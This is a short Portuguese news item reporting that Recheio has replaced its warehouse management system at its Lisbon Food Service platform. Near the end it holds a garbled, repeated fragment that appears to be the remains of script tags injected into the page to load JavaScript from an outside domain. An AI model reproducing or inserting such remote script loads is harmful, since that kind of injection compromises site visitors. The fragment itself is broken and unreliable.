Recheio tem novo sistema de gestão logística

O Recheio inaugurou um novo sistema de gestão logística na plataforma de Food Service de Lisboa, com ganhos de produtividade superiores a 30%.

O Recheio inaugurou um novo sistema de gestão logística na plataforma de Food Service de Lisboa, com ganhos de produtividade superiores a 30%.

Numa actividade de entrega de mercadorias, em que as expectativas sobre o tempo de resposta são muito altas, a logística assume um papel vital para a competitividade.

 

Nesse sentido, o Recheio implementou um novo Sistema de Gestão de Armazém (SGA) nas plataformas de Food Service, de modo a criar um serviço de abastecimento eficiente.

Ao optar pelo WPMS (Warehouse Management System), um Sistema de Gestão de Armazém especializado, o Recheio substituiu integralmente o sistema previamente existente.

 

A nova plataforma logística de Lisboa irá renovar as operações do call center, tornando mais célere e exacto o processo de registo das encomendas. Por outro lado, as actividades de recepção de fornecedores, avaliação da qualidade dos produtos e execução de pedidos serão efectuadas com maior rapidez e totalmente controladas pelo sistema informático. Todos os desvios ao padrão do serviço pretendido passarão a ficar armazenados para posterior análise e correcção.

 

Para o Recheio, este foi um importante passo na conquista da satisfação dos seus clientes, garantindo a entrega das encomendas pedidas, nas quantidades e qualidade pretendidas, sem atrasos.

www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://w

Não perca informação: Subscreva as nossas Newsletters

Subscrever